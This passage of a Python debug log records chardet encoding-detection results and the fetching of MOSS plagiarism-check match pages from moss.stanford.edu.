active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20089\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16297\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16296\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20088\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5472988216411365\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not 
active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5516082579026649\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match72-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match72-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match72-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match75-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match75-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match75-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match73-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match73-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match73-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match76-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17439\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19937\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17426\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19924\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31460\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17439\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19937\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17426\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31447\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19924\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17426\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31460\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17427\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19924\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31447\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17426\nDEBUG:chardet.charsetprober:Big5 Chinese prober 
hit error at byte 19925\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31447\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19924\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31448\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31447\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5251957085109056\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 
0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5264956214254594\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5587207154234618\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match76-0.html\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match76-1.html\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.52588685464549\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR 
not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match74-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match74-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match74-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match80-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match80-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match80-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match81-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20818\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20805\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20818\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20805\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20805\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20806\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20805\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5412885204715342\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 
0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5587305145897865\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match81-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match81-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match82-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match82-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match82-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match83-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match83-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match83-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match87-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19082\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19069\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19082\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25765\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19571\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19069\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25752\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19069\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25765\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19070\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19069\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25752\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19572\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25752\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian 
confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19571\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5433904233402658\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25753\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match87-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match87-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25752\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.529678083164815\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 
0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5399933395517909\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match86-top.html\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match86-0.html\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match86-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match85-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match85-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match85-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16673\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40953\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16660\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19263\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16673\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32476\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40940\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19250\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16660\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19263\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40953\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16660\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32463\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19250\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40940\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16661\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32476\nDEBUG:chardet.charsetprober:CP949 Korean 
